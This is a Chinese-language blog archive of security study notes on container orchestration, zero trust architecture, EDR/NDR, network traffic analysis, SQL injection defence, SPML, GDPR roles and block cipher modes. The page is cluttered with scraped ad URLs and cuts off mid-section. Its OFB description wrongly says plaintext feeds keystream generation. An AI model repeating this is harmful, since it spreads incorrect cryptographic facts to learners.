當您使用容器編排工具時,例如 Kubernetes 或 Docker Swarm(稍後會詳細介紹),您通常會在 YAML 或 JSON 文件中描述應用程序的配置,具體取決於編排工具。
這些配置文件(例如 docker-compose.yml)是您告訴編排工具在哪裡收集容器鏡像(例如,從 Docker Hub)、如何在容器之間建立網絡、如何掛載存儲卷以及在哪裡收集容器鏡像的地方。存儲該容器的日誌。
通常,團隊將對這些配置文件進行分支和版本控制,以便他們可以在不同的開發和測試環境中部署相同的應用程序,然後再將它們部署到生產集群。
資料來源:艾薩克·埃爾德里奇(Isaac Eldridge)

基礎設施即代碼 (Infrastructure as Code :IaC)
不可變的基礎設施是可編程的,可以實現自動化。基礎設施即代碼 (IaC) 是現代基礎設施的關鍵屬性之一,其中應用程序可以以編程方式提供、配置和利用基礎設施來運行自己。
資料來源:新堆棧(thenewstack)

參考
什麼是容器編排?
什麼是容器編排?(虛擬機)
什麼是容器編排?(IBM)

資料來源: Wentz Wu QOTD-20211008
My Blog: https://choson.lifenet.com.tw/

分類
Information Security

駭客終結者 2.0 登場!打破舊有資安概念,零信任架構 (ZTA) 引領資安新風潮

現今,人們對於網路的依賴性大,尤其是疫情影響下的社會,各家企業紛紛採取居家辦公,此外,日常中的網路銀行轉帳、購買日用品、電子信箱等功能均需利用網路。但網路便利的同時,伴隨而來的就是,個資外洩、網路上的購賣身分遭到惡意人士盜用,魔鬼藏匿於網路的角落,緊盯著各個使用者的活動,看看誰是下一個受害者。為了層層把關網路上的潛在危機,零信任架構 (Zero Trust Architecture,ZTA) 出現了!ZTA 是一種資安防護的新概念,打破了傳統以邊界(例如防火牆)區分內網及外網的資安型態。今天,想長點 ZTA 的新知識嗎?跟著查士朝教授的腳步來探索一下這個酷東西吧!

查士朝教授小簡介

查教授是台灣大學資訊管理博士,曾任職於意藍科技資深技術顧問,於資誠企業擔任資深經理。現為台灣科技大學資訊管理系教授,同時也身兼資通安全研究與教學中心主任。查教授獲得許多國際資安認證,近年致力於資訊安全相關研究,參與多項產學合作計畫,並協助政府建立資訊安全管理制度,並發掘系統資安漏洞以研擬推動智慧型手機應用程式安全與物聯網裝置安全檢測標準。查士朝教授

查士朝教授近幾年於資訊安全制度訂定及設計發想貢獻良多。圖/查士朗教授提供

ZTA 的誕生與發展

2003 及 2004 年間,傑里科論壇 (Jericho Forum) 為了達到網路資源於企業間共享的目的,因此想出了消除企業與企業間的網路邊界,但這個做法也造成了網路安全的漏洞,而解決這個漏洞的技術性方案就是 ZTA 的最初架構。可以說是無心插柳,柳成 ZTA 阿!但是,這個論壇當初提及的 ZTA 概念還是滿抽象的,因此,Forrester Research 前副總裁 John Kindervag 於 2010 年提出了具體的概念,他提出了三大核心理念:(一)裝置不再有信賴與不信賴的邊界 ,(二)不再有信賴與不信賴的網路,(三)不再有信賴與不信賴的使用者。而實際上的做法需要四大核心元件:

  1. 網路分區閘道 (Network Segmentation Gateway):當前的網路需要透過許多安全設備來保護其整體環境及數據,例如我們最常見的就是防火牆,還有為取得公司或機構內部存取權所需要用到的工具 VPN 。而 John Kindervag 想要開發出一個結合所有安全設備特性及功能的網路分區閘道(最強守衛者的概念),並將安全性構建到網路的架構當中,以安全的方式正確分割網路資源。
  2. 創建平行且安全的網路分區:打破以往防火牆只一分為二,阻隔外界及保護內部的功能。這裡運用的是微核心邊界 (Microcore and perimeter, MCAP) (圖二),你可以把它想像為「保護套」,將你想保護的資料都個別套起來,像是使用者端、網路應用、資料獲取網路都自己有一層保護套。如此一來,將資安防護不再單單只靠一層防火牆,而是個個資料、系統都有盾牌可以做自我保護。
  3. 網路後臺集中管理:承第 2 點提及的「保護套」,網路後臺是擔任管理這些微核心邊界 (MCAP) 的角色,增加操作上的便利性。
  4. 建立數據蒐集網路以掌控網路整體狀況:對於修繕故障網路的人來說,要能有效取得數據包是件非常困難的事,但在零信任網路中採用數據蒐集網路 (data acquisition network, DAN),此種方法結合網路分區閘道,能有效採集各個微核心的數據,加速數據取得以便日後故障修繕。

微核心邊界

微核心邊界 (Microcore and perimeter, MCAP) 使整體網路環境又多一層保障。圖/查士朝教授提供

此外,美國國家標準技術研究院 (NIST) 也量身打造 ZTA 的標準指南 SP 800-207,時至今年美國政府所公布的網路安全策略中也包含了零信任架構,甚至要求美國聯邦政府網路導入零信任架構的網路安全策略,足見零信任網路架構在整體資安領域上佔有一席之地。當中,SP 800-207 講究七大原則:(1) 識別可存取資源;(2) 確保連線安全;(3)妥善存取控制;(4)考量存取者狀態;(5)了解資源狀態;(6)監控裝置與資源風險;(7)持續收集資訊與改善。

現今資訊安全防護存在什麼樣的漏洞?ZTA 如何防範的資安危機?

新聞報導資安危機事件層出不窮,於個人,個人資料被盜用、信用卡被盜刷;於企業,美國淨水廠系統及最大燃油管系統、銀行 ATM、國內科技大廠都曾遭受駭客及勒索軟體襲擊;於國家,國安危機更是重大事件。查教授講道過去的資安架構,往往只是透過防火牆等相關架構,將安全與不安全網域劃清界線,並且只注重防範邊界,無法防止內部橫向擴散。然現今惡意駭客早已能夠輕鬆越過此界線,橫行於安全網域之中。駭客盜取企業內部資源

疫情下的遠距辦公,使駭客能趁機憑藉多種管道盜取企業內部資源。圖/查士朗教授提供

因此,ZTA 雖說是打破邊界,更貼近的說法則是將邊界切得更細。舉個具體的例子,即便使用者可以憑藉身分認證進入一家企業內,使用這家企業的信任網域做任何活動,而 ZTA 就像監視器一樣,會監視著使用者在網域上的一舉一動。除了監視,要防範惡意者,也必須判斷其活動並及時阻止惡意行為,因此查教授特別講解了 ZTA 的「大腦」和「手」,政策落實點 (Policy Enforcement Point,PEP) 是 ZTA 的手,當使用者發出存取公司內網資源的要求時,PEP 會先接收到這個訊息,並將此訊息傳遞給政策決策點 (Policy decision point,PDP) (也就是 ZTA 的大腦)決定是否允許這位使用者的要求,在 PDP 下達決定後,PEP 便會聽從這個決定做出相應的舉動。而 PDP 內部則是仰賴所謂的信賴演算法,它會考慮存取要求、主體資料庫及歷史、資產資料庫、資源政策要求、威脅情資與紀錄來做訓練,當然現今的 ZTA 架構會依照各個企業或機關的需求而有客製化的調整。政策落實點 (PEP)及政策決策點 (PDP)

政策落實點 (PEP)及政策決策點 (PDP)是 ZTA 的核心機制之一。圖/查士朗教授提供

ZTA的迷思

迷思一:零信任架構=完全不信任任何使用者?

ZTA 是為了防止有心人士在進入企業內網後就能肆意做出任何惡意行動,但如果你是一個正常的使用者,只要通過認證,ZTA 還是會信任你的。

迷思二:ZTA 真的方便用嗎?會不會一直需要驗證?

查教授回答道 ZTA 通常會以連線為基礎做出行動,若是新建立連線必然要經過一次驗證,之後便會自動存取使用者驗證,並依照各家企業規定設定間隔多久需再驗證一次,所以不見得都要一直驗證。

迷思三:ZTA 在驗證、授權的過程中,均需要取得使用者和其使用裝置的相關資訊,是否會引發隱私權益問題?

查教授仔細講道,若是疫情下在家工作,使用自己的私人電腦連線公司內網,ZTA 確實有可能會看見私人電腦上的隱私資料。但是最簡單的解決方法,就是使用公發電腦或設備,這樣就不怕自己電腦的東西被看光光囉!

迷思四:ZTA 可以完全取代 VPN?

查教授表示 VPN 在零信任架構中是連線工具而非安全工具,VPN 固然是遠端連線的常用工具,但它的存取權限非常有限(通常不會讓使用者從外部透過 VPN 碰到公司重要資源)。因此,ZTA 和 VPN 的作用其實是各司其職,VPN 負責連線,ZTA 則是負責公司內部重要資源保護與防範安全。

ZTA 的未來展望及挑戰

查教授認為目前主要有兩項挑戰:一、要達到零信任架構的整合,以現在的設備發展,不太可能把所有的設備都換掉,因此如何將既有設備整合到零信任架構、達到相關要求是一個重點。二、上述所提及的信賴演算法訓練程度也是一大重點,它是 ZTA 的核心,假使訓練得宜,安全防護加倍,反之,問題可就大囉~另外,ZTA 在台灣可說是百家廠商爭鳴的主推架構,但查教授認為更重要的是,普及 ZTA 的概念宣導讓社會大眾理解其運作模式,如此,對於個人,能免於受到財務或個資損失;對於企業,能成為永續運作的一環,免於資安問題而殃及利害關係人權益;對於國家,不但能領先於資訊戰,更能提供民眾穩定、信賴的服務,維護公有設施系統的穩定性。ZTA 是新型態的保護概念,不單單只局限於個人研發上的努力,更需整體社會、企業、政府的致力推動方能共創榮景。

查教授給有志投入資安產業者的勉勵

查教授真切地說道資安的領域很廣,涵蓋了技術、管理、稽核層面,當然甲方和乙方的需求也不一樣,若想知道自己適合哪個領域、哪個職位,首先必須清楚自己的個性,究竟是穩定型,還是喜歡探索開發型。但無論如何,做資安產業的人個性都要正直,並把基本功打好。

結語

很榮幸這次邀請到查士朝教授探討關於 ZTA 的概念,透過教授清楚仔細的講解,想必讀到這邊的讀者們已經收穫滿滿,ZTA 雖然起初設計的基礎是建立在企業上,但查教授認為未來也可能透過多因素身分認證 (Multi-factor authentication, MFA) 廣泛運用於個人資訊系統。ZTA 的發展指日可待! 資料來源

資料來源:https://scitechvista.nat.gov.tw/Article/C000003/detail?ID=5ad7a015-9e9a-4268-aa32-2ade792e7440

分類
Information Security

EDR與NDR是可以相輔相成

市場上已有EDR或MDR的方案了,為什麼還需要NDR呢?

其實EDR與NDR是可以相輔相成的而不全然是彼此競爭的態勢,為何如此說?因為EDR的方案是要在端點上佈放Agent/Token,由這個Agent常駐在記憶體上去偵測有什麼惡意程式執行了開啟不該開的底部BIOS或某個異常通道等動作時,即時產生告警並通知中心管理平台,去比對還有哪些端點發生類似情形,進而阻擋mailto:惡意程式的蔓延感染達成有效防制的功用!

但是對不能安裝Agent/Token的端點如網路攝影機、IOT、各種感應器與Kiosk+ 設備,這些無法安裝Agent的設備也十分多,而且在企業數位轉型過程中會越來越多 IoT/IoMT等非電腦OS的設備,這類別的設備往往是没有像PC/Notebook OS具有防毒的功能,反而是最容易被殖入木馬程式成為駭客遙控的工具,這些流量在EDR方案中是無法監看的,因此NDR就是用來補足此空缺部分的資安偵測,當然,NDR所監看的範圍不受Agent佈放的限制,因此其應用比EDR來得更廣,而EDR則可即時阻絶惡意程的啟用,各自運作是有很大的不同,由此可知NDR與EDR是可以互相協同對抗駭客的!同時,坊間有許多與NDR可以協同防禦的資安廠家如Cisco、PA、Crowdstrike、Splunk、Arcsight等等,彼此分享資安訊息,進而增進資安判斷的精確性同時也擴大防禦的縱深。

資料來源:https://www.mtechpro.com.tw/6047/

分類
CISSP

Wifi

分類
Information Security

網路安全NTA技術基本分析

​本文章,主要參考資料為,《Market Guide for Network Traffic Analysis》by Gartner;《Network Traffic Analysis》 by awake;《NTA以及空間與時間的防禦——山石網科的安全理解》by 山石網科;2020年1月,與Gartner分析師的現場討論。如有不對及錯誤之處請及時提醒,以便本人修正。

2、NTA是什麼?

Gartner對NTA的定義

​NTA使用 機器學習 、 高階分析 和 特徵分析 來檢測企業網路上的可疑行為。NTA不斷地分析原始流量,以構建反映 正常網路行為的模型 。當NTA工具檢測到異常的流量模式時,它們會發出警報。除了監視跨越企業邊界的北/南通訊量之外,NTA解決方案還接入東西流量。

Gartner提出NTA的兩個結論

  • 在技術上,NTA使用行為分析技術,幫助企業檢測可疑流量,用以發現更多其他裝置不能發現的安全問題。
  • 在市場上,NTA市場門檻低,且市場很擁擠(原來傳統安全廠商很容易就進入)

山石關於NTA定義的解讀

​NTA是一種功能和能力,而非純粹的一個產品。NTA融合了傳統的基於規則的檢測技術,以及機器學習和其他高階分析技術,用以檢測企業網路中的可疑行為,尤其是失陷後的痕跡。NTA通過DFI和DPI技術來分析網路流量,通常部署在關鍵的網路區域對東西向和南北向的流量進行分析,而不會試圖對全網進行監測。

4、個人分析

個人對NTA的定義

首先,我先給出我對NTA的定義,大家可以先此有一些基本概念。

  1. NTA是一種功能和能力。
  2. NTA功能利用行為基線,進行安全問題分析。
  3. NTA功能某些方面與網路效能管理類似,具有對當前網路的可視性。
  4. NTA功能主流的分析方法是 對比 。
  5. NTA功能與入侵檢測功能邏輯等價,都會在邊界類盒子產品中出現。
  6. NTA功能要做的是定義網路行為,收集網路行為。
  7. NTA功能要在核心節點進行收集行為,有南北向流量、也有東西向流量。
  8. NTA功能要能有發現可疑流量的能力。
  9. NTA功能要能有展示入侵證據的能力。
  10. NTA功能要能有定義入侵事件的能力。
  11. 產品還要圍繞NTA功能提示客戶一些修復建議。

NTA定義解讀的角度一

​NTA與IDS的輸入是一致的(網路映象流量),輸出也是一致的(安全威脅事件),二者的區別在於發現威脅的方法不同。因此,我們可以理解為,NTA是補充邊界安全產品的一項技術能力,與入侵檢測能力在邏輯上是等價,兩者都是幫助企業發現威脅的技術能力。此外個人還認為,只要是在接入映象流量後,使用正常資料構建資料基線,然後以對比的方式進行安全分析,就可以算NTA能力。

  • 入侵檢測發現威脅的方式是利用特徵檢測判斷異常或者入侵行為。
  • NTA發現威脅的方式是利用多種技術構建正常行為模型,以資料基線的角度判斷異常或者入侵行為。

​在安全場景上看,即使是APT攻擊,攻擊者依然會遵循一定的方式進行:前期對IT環境的偵查、對邊界的嘗試繞過、社會工程學與釣魚的針對人攻擊、內網的擴散、後門的植入等。而NTA的的價值就在於通過對實際流量進行分析、對比,發現威脅。

​在分析能力上看,基於行為模型分析的分析技術,行為模型的質量主要依賴於模型訓練的能力,模型訓練的質量主要依賴於安全大資料的量級與質量,這點也是小安全廠商無法建立技術壁壘的因素,也就是說由於這種依賴關係,小廠商的NTA能力大概率是不如大廠商。

​當然,隨著傳統邊界安全產品在處理效能上的提升,部署也可以覆蓋南北,東西向流量。這點不是NTA獨有。

NTA定義解讀的角度二

​在密碼學中,旁道攻擊又稱側通道攻擊、邊通道攻擊(英語:Side-channel attack)是一種攻擊方式,它基於從密碼系統的物理實現中獲取的資訊而非暴力破解法或是演算法中的理論性弱點(較之密碼分析)。例如:時間資訊、功率消耗、電磁洩露或甚是聲音可以提供額外的資訊來源,這可被利用於對系統的進一步破解。某些側通道攻擊還要求攻擊者有關於密碼系統內部操作的技術性資訊,不過,其他諸如差分電力分析的方法在黑盒攻擊中效果明顯。許多卓有成效的側通道攻擊基於由保羅·科切開拓的統計學方法。

​側通道攻擊帶給我們的知識,是讓我們懂得分析問題維度是多種多樣的。隨著我們對知識點了解的更深,尋找資訊的視野與寬度就會變得更加獨特。比如判斷一個人是否在跑步,首先我們可以從畫面的角度判斷,另外還可以從地面的震動,空氣的流動,這個人的心率等其他維度進行綜合判斷。此外,如果還有時間軸的資訊,那麼有時間標註的圖片,外加上位置資訊,也可以判斷。https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1822891735294022&output=html&h=280&adk=2052652991&adf=1545348441&pi=t.aa~a.227032608~i.85~rp.4&w=710&fwrn=4&fwrnh=100&lmt=1644850278&num_ads=1&rafmt=1&armr=3&sem=mc&pwprc=2204832630&psa=1&ad_type=text_image&format=710×280&url=https%3A%2F%2Fwww.gushiciku.cn%2Fpl%2FpY5e%2Fzh-tw&flash=0&fwr=0&pra=3&rh=178&rw=710&rpe=1&resp_fmts=3&wgl=1&fa=27&uach=WyJtYWNPUyIsIjEyLjEuMCIsImFybSIsIiIsIjk4LjAuNDc1OC44MCIsW10sbnVsbCxudWxsLCI2NCIsW1siIE5vdCBBO0JyYW5kIiwiOTkuMC4wLjAiXSxbIkNocm9taXVtIiwiOTguMC40NzU4LjgwIl0sWyJHb29nbGUgQ2hyb21lIiwiOTguMC40NzU4LjgwIl1dXQ..&dt=1644849675680&bpp=1&bdt=290&idt=1&shv=r20220209&mjsv=m202202030101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D03817e540e91079b-2261bb309ed0001b%3AT%3D1644849641%3ART%3D1644849641%3AS%3DALNI_MZlnRqHBxGYLRvdz4GXS7Um_PX4gQ&prev_fmts=0x0%2C720x280%2C360x280%2C1005x124&nras=4&correlator=349663976246&frm=20&pv=1&ga_vid=1595495561.1644849641&ga_sid=1644849676&ga_hid=1071791596&ga_fc=1&u_tz=480&u_his=12&u_h=1080&u_w=1920&u_ah=1055&u_aw=1920&u_cd=24&u_sd=1&dmc=8&adx=126&ady=3931&biw=1351&bih=780&scr_x=0&scr_y=830&eid=42531397%2C21067496&oid=2&psts=AGkb-H9PyFk1IJ_jbm1OXuaFenjA75iQv2BS43ey_eDuSnjVMFMI4b2HMQ6LnZCkTyswDg5SdBuNCeZURgs%2CAGkb-H-bFKSiNz-LSBYsIKUxxXiDKflI4CEOLdx2prGErJj5teGX84P36RY8gQMGPTYRJLeJn_Qr9iophguNQyz2duyF5TQiPNf3GLhPF2sB&pvsid=3479824829917071&pem=52&tmod=715103767&uas=1&nvt=1&eae=0&fc=1408&brdim=-1564%2C165%2C-1564%2C165%2C1920%2C70%2C1366%2C891%2C1366%2C780&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&ifi=4&uci=a!4&btvi=3&fsb=1&xpc=Kxh4vH2dPD&p=https%3A//www.gushiciku.cn&dtd=M

​其實做入侵檢測也是如此,分析資訊的維度不光有當前資訊的內容,還可以有承載資訊的通道,也就是Tcp流的概念。NTA的概念從這個角度也可以解釋,NTA關注的點是行為。思考類比,比如生活中的運動手環,蘋果手錶,等一些可穿戴產品都是基於行為資料來作為資料分析的依據。

​因此以生活中的行為分析為基礎,類比網路安全的行為分析。那麼得出的結論是,能直接進行資訊判斷的還應該保持,併發揮其特長;當不能進行直接分析時,我們才會進行行為分析。因此DPI技術和NTA技術是對入侵檢測能力的相互補充,而不是替代。

NTA安全場景分析

​NTA在流量側解決的問題,一定是傳統裝置不能解決的,或者說是傳統手段解決不好的問題,也就是通過DPI不能解決的問題。

​NTA解決的是異常流量行為問題,我總結了一些安全場景,如下所示。

  1. 高頻攻擊產生的異常流量
  2. 黑客入侵產生的異常流量
  3. 終端病毒產生的異常流量
  4. 高階威脅產生的異常流量
  5. 資料外洩產生的異常流量
  6. 殭屍網路產生的異常流量
  7. 惡意挖礦產生的異常流量
  8. 網路蠕蟲產生的異常流量

NTA關鍵點分析

​由於NTA要解決的安全問題,以及解決問題使用的方法。因此,個人認為要想獲得強大的NTA能力,以及在NTA側建立領先優勢,需要在三個方面下功夫。

​第一,明確安全場景,對安全場景理解的越深入,就越能夠了解到解決這類問題的基本需求,還能夠幫助我們在研發上獲得更好的結構性。從另一個方面講,明確安全場景也是對“未知攻,焉知防”的最佳實踐。https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1822891735294022&output=html&h=280&adk=2052652991&adf=3193967769&pi=t.aa~a.227032608~i.105~rp.4&w=710&fwrn=4&fwrnh=100&lmt=1644850286&num_ads=1&rafmt=1&armr=3&sem=mc&pwprc=2204832630&psa=1&ad_type=text_image&format=710×280&url=https%3A%2F%2Fwww.gushiciku.cn%2Fpl%2FpY5e%2Fzh-tw&flash=0&fwr=0&pra=3&rh=178&rw=710&rpe=1&resp_fmts=3&wgl=1&fa=27&uach=WyJtYWNPUyIsIjEyLjEuMCIsImFybSIsIiIsIjk4LjAuNDc1OC44MCIsW10sbnVsbCxudWxsLCI2NCIsW1siIE5vdCBBO0JyYW5kIiwiOTkuMC4wLjAiXSxbIkNocm9taXVtIiwiOTguMC40NzU4LjgwIl0sWyJHb29nbGUgQ2hyb21lIiwiOTguMC40NzU4LjgwIl1dXQ..&dt=1644849675682&bpp=1&bdt=292&idt=0&shv=r20220209&mjsv=m202202030101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D03817e540e91079b-2261bb309ed0001b%3AT%3D1644849641%3ART%3D1644849641%3AS%3DALNI_MZlnRqHBxGYLRvdz4GXS7Um_PX4gQ&prev_fmts=0x0%2C720x280%2C360x280%2C1005x124%2C710x280&nras=5&correlator=349663976246&frm=20&pv=1&ga_vid=1595495561.1644849641&ga_sid=1644849676&ga_hid=1071791596&ga_fc=1&u_tz=480&u_his=12&u_h=1080&u_w=1920&u_ah=1055&u_aw=1920&u_cd=24&u_sd=1&dmc=8&adx=126&ady=4618&biw=1351&bih=780&scr_x=0&scr_y=1510&eid=42531397%2C21067496&oid=2&psts=AGkb-H9PyFk1IJ_jbm1OXuaFenjA75iQv2BS43ey_eDuSnjVMFMI4b2HMQ6LnZCkTyswDg5SdBuNCeZURgs%2CAGkb-H-bFKSiNz-LSBYsIKUxxXiDKflI4CEOLdx2prGErJj5teGX84P36RY8gQMGPTYRJLeJn_Qr9iophguNQyz2duyF5TQiPNf3GLhPF2sB&pvsid=3479824829917071&pem=52&tmod=715103767&uas=1&nvt=1&eae=0&fc=1408&brdim=-1564%2C165%2C-1564%2C165%2C1920%2C70%2C1366%2C891%2C1366%2C780&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&ifi=5&uci=a!5&btvi=4&fsb=1&xpc=AckNLat2Qm&p=https%3A//www.gushiciku.cn&dtd=M

​第二,明確基礎資料。這裡的基礎資料可以是輸入到人工智慧模型裡的結構化資料,也可以是安全演算法需要的資料,我們要了解基礎資料能提供的資訊以及這些資訊背後的含義。其實這點也是對安全場景理解的基礎上,再進行深入理解。

​第三,分析演算法選擇。這裡我不建議非要用機器學習演算法,我們知道機器學習演算法目前在對結構化資料理想的情況下,會表現出不錯的能力。但是對於安全資料,結構化的程度,資訊量的提供,這些都會打一個問號。當然,如果有很好的安全能力和演算法能力,那這還是可以去嘗試的。個人認為使用正常資料模板和安全場景模板這兩種方式,會比較立竿見影。從攻擊者視角思考,利用工具進行高效的攻擊是一個好的選擇。而且絕大數的攻擊者並沒有具備改變安全工具行為模式的能力,因此我們構建安全工具行為模板可以有效的進行對抗。

軟體架構基本分析

​對於在企業級市場中,中大型企業一般都會對多個關鍵點的映象流量資料進行安全檢測,因此在這種情況下,使用探針和平臺的架構是非常合理的。在探針側進行獨立的資料採集、在平臺側進行資料彙總及管理,後期也能比較方便的和其他產品聯動。

​由於NTA功能的融入,平臺側需要很大的計算能力,因此平臺側選擇大資料架構是比較合適的,大資料架構提供的資訊儲存能力、資訊檢索能力、資訊計算能力,可以有效的提升我們的異常分析能力。

關於資料基線的引申

​對於NSFOCUS使用NetFlow構建資料基線是沒問題的,但其實也可以擴大一些概念。我們不妨把NSFOCUS使用的叫NetFlow資料基線,於此同時,不難可以聯想到其他資料基線,比如http訪問資料基線、dns訪問資料基線,資料庫行為資料基線,郵件行為資料基線,以此類推,我們可以構建更多味的的資料基線,當然怎麼進行資料基線的處理則是另一回事。

5、相關資訊

DFI和DPI技術介紹

​DPI全稱為“Deep Packet Inspection”,稱為“深度包檢測”。DPI技術在分析包頭的基礎上,增加了對應用層的分析,是一種基於應用層的流量檢測和控制技術,當IP資料包、TCP或UDP資料流經過基於DPI技術的頻寬管理系統時,該系統通過深入讀取IP包載荷的內容來對OSI7層協議中的應用層資訊進行重組,從而得到整個應用程式的內容,然後按照系統定義的管理策略對流量進行整形操作。

​DFI全稱為“Deep/Dynamic Flow Inspection“,稱為”深度/動態流檢測“,與DPI進行應用層的載荷匹配不同,採用的是一種基於流量行為的應用識別技術,即不同的應用型別體現在會話連線或資料流上的狀態各有不同。 DFI技術正是基於這一系列流量的行為特徵,建立流量特徵模型,通過分析會話連線流的包長、連線速率、傳輸位元組量、包與包之間的間隔等資訊來與流量模型對比,從而實現鑑別應用型別。

資料來源:https://www.gushiciku.cn/pl/pY5e/zh-tw

分類
CISSP

最有效的防止 SQL 注入攻擊的技術控制-參數化 SQL 查詢

https://ithelp.ithome.com.tw/upload/images/20220211/20132160PEJoDy9ZUJ.jpg
-層與層(Layer vs Tier)
前端輸入驗證和受限用戶界面是針對錶示層中的 SQL 注入的對策,這通常發生在客戶端。但是,攻擊者可能不會從表示層發起 SQL 注入,而是直接將帶有註入代碼的輸入提交到服務器端並繞過用戶界面。
輸入驗證應在客戶端和服務器端應用。參數化的 SQL 查詢可以在業務邏輯層或數據訪問層實現;這兩層都位於服務器端。
安全意識和培訓不是技術控制。

資料來源: Wentz Wu QOTD-20211006
My Blog: https://choson.lifenet.com.tw/

分類
CISSP

SPML用於將跨資訊系統之創建和管理實體和屬性的過程自動化

在一個電信行業的技術詞彙,它是指為了向用戶提供(新)服務的準備和安裝一個網絡的處理過程。它也包括改變一個已存在的優先服務或功能的狀態。
「服務開通」常常出現在有關虛擬化、編配、效用計算、雲計算和開放式配置的概念和項目的上下文中。例如,結構化信息標準促進組織(Organization for the Advancement of Structured Information Standards,簡稱OASIS)開通服務技術委員會(Provisioning Services Technical Committee,簡稱PSTC),為交換用戶、資源和服務開通信息定義了一個基於可擴展標記語言(Extensible Markup Language,簡稱XML)的框架,例如,用於「在機構內部或之間管理身份信息和系統資源的服務開通和分配」的服務開通標記語言(Service Provisioning Markup Language,簡稱SPML):維基百科

參考
服務開通

資料來源: Wentz Wu QOTD-20210929

分類
CISSP

資料控制者(data controller)

https://ithelp.ithome.com.tw/upload/images/20220104/20132160hg96My25TN.jpg
-資料和系統所有者
將“資料所有者“(data owner)和“資料控制者”(data controller)一視同仁的情況並不少見。然而,事實並非如此。資料控制者專門用於個人資料和隱私的上下文中,而資料所有者通常意味著組織擁有資料的所有權,並且資料所有者負責保護他所委託的資料。
這個問題都是關於個人資料資料資料的保護,引用了 GDPR 中的文字,所以“資料資料控制者”比“資料所有者”更合適。可以直接或間接識別的人意味著資料主體。
Art. 4 GDPR 定義“個人資料”是指與已識別或可識別的自然人(“數據主體”)相關的任何信息;可識別的自然人是可以直接或間接識別的自然人,特別是通過參考諸如姓名、識別號、位置資料、在線標識符或特定於身體、生理、該自然人的基因、精神、經濟、文化或社會身份;
Art. 24 GDPR 控制者的責任:考慮到處理的性質、範圍、背景和目的以及自然人權利和自由的不同可能性和嚴重程度的風險,控制者應實施適當的技術和組織措施,以確保並且能夠證明處理是按照本條例進行的。 這些措施應在必要時進行審查和更新。
資料來源:GDPR

參考
Art. 4 GDPR 定義

資料來源: Wentz Wu QOTD-20210928

分類
CISSP

加密演算法

這個章節來講對稱式加密一些細節 ,如果有心細的讀者已經發現在使用 DES 及 AES ,會看到 ECB 、CBC 、PKCS7、IV 等有如外星人的語言般參數或誰誰誰說什麼比較好,這章我們就是要來掀開這些神祕面紗

加密模式(mode of operation)

分組加密演算法是按分組大小來進行加解密操作的,如DES演算法的分組是64位,而AES是128位,但實際明文的長度一般要遠大於分組大小,這樣的情況如何處理呢?

這正是即工作模式要解決的問題:明文資料流怎樣按分組大小切分,資料不對齊的情況怎麼處理等等。

早在1981年,DES演算法公佈之後,NIST在標準文獻FIPS 81中公佈了4種工作模式:

  • 電子密碼本:Electronic Code Book Mode (ECB)
  • 密碼分組連結:Cipher Block Chaining Mode (CBC)
  • 密文反饋:Cipher Feedback Mode (CFB)
  • 輸出反饋:Output Feedback Mode (OFB)

2001年又針對AES加入了新的工作模式:

  • 計數器模式:Counter Mode (CTR)

後來又陸續引入其它新的工作模式。在此僅介紹幾種常用的

ECB:電子密碼本模式

ECB模式只是將明文按分組大小切分,然後用同樣的金鑰正常加密切分好的明文分組。

image-20201005193407516

ECB的理想應用場景是短資料(如加密金鑰)的加密。此模式的問題是無法隱藏原明文資料的模式,因為同樣的明文分組加密得到的密文也是一樣的。

CBC:密碼分組連結模式

此模式是1976年由IBM所發明,引入了IV(初始化向量:Initialization Vector)的概念。IV是長度為分組大小的一組隨機,通常情況下不用保密,不過在大多數情況下,針對同一金鑰不應多次使用同一組IV。 CBC要求第一個分組的明文在加密運算前先與IV進行異或;從第二組開始,所有的明文先與前一分組加密後的密文進行異或。[區塊鏈(blockchain)的鼻祖!]

AES: 密碼分組連結模式

CBC模式相比ECB實現了更好的模式隱藏,但因為其將密文引入運算,加解密操作無法並行操作。同時引入的IV向量,還需要加、解密雙方共同知曉方可。

CFB:密文反饋模式

與CBC模式類似,但不同的地方在於,CFB模式先生成密碼流字典,然後用密碼字典與明文進行異或操作並最終生成密文。後一分組的密碼字典的生成需要前一分組的密文參與運算。

AES: 密文反饋模式

CFB模式是用分組演算法實現流演算法,明文資料不需要按分組大小對齊。

OFB:輸出反饋模式

OFB模式與CFB模式不同的地方是:生成字典的時候會採用明文參與運算,CFB採用的是密文。

AES: 輸出反饋模式

CTR:計數器模式模式

CTR模式同樣會產生流密碼字典,但同是會引入一個計數,以保證任意長時間均不會產生重複輸出。

AES: 計數器模式

CTR模式只需要實現加密演算法以生成字典,明文資料與之異或後得到密文,反之便是解密過程。CTR模式可以採用並行演算法處理以提升吞量,另外加密資料塊的訪問可以是隨機的,與前後上下文無關。

CCM:Counter with CBC-MAC

CCM模式,全稱是Counter with Cipher Block Chaining-Message Authentication Code,是CTR工作模式和CMAC認證演算法的組合體,可以同時資料加密和鑑別服務。

明文資料通過CTR模式加密成密文,然後在密文後面再附加上認證資料,所以最終的密文會比明文要長。具體的加密流程如下描述:先對明文資料認證併產生一個tag,在後續加密過程中使用此tag和IV生成校驗值U。然後用CTR模式來加密原輸入明文資料,在密文的後面附上校驗碼U。

GCM:伽羅瓦計數器模式 Galois/Counter Mode

GCM模式是CTR和GHASH的組合,GHASH操作定義為密文結果與金鑰以及訊息長度在GF(2^128)域上相乘。GCM比CCM的優勢是在於更高並行度及更好的效能。

GCM中的G就是指GMAC,C就是指CTR。
GCM可以提供對消息的加密和完整性校驗,另外,它還可以提供附加消息的完整性校驗。在實際應用場景中,有些信息是我們不需要保密,但信息的接收者需要確認它的真實性的,例如源IP,源端口,目的IP,IV,等等。因此,我們可以將這一部分作為附加消息加入到MAC值的計算當中。下圖的Ek表示用對稱秘鑰k對輸入做AES運算。最後,密文接收者會收到密文、IV(計數器CTR的初始值)、MAC值。

500px-GCM-Galois_Counter_Mode_with_IV.svg (1)

由於GCM現在屬於最嚴謹的加密模式,TLS 1.2標準使用的就是AES-GCM演算法。

加密模式優缺點

ECB

Electronic CodeBook (ECB),不變的 key,需要加密器和解密器,加解密的複雜度可能不同。

  • 優點:
    構造簡單、容易實做
  • 缺點:
    長時間下,容易被偵測。影像資料的差異性不大,很容易被辨識到重複性,相較於文字很容易受前後文的影響。

CBC

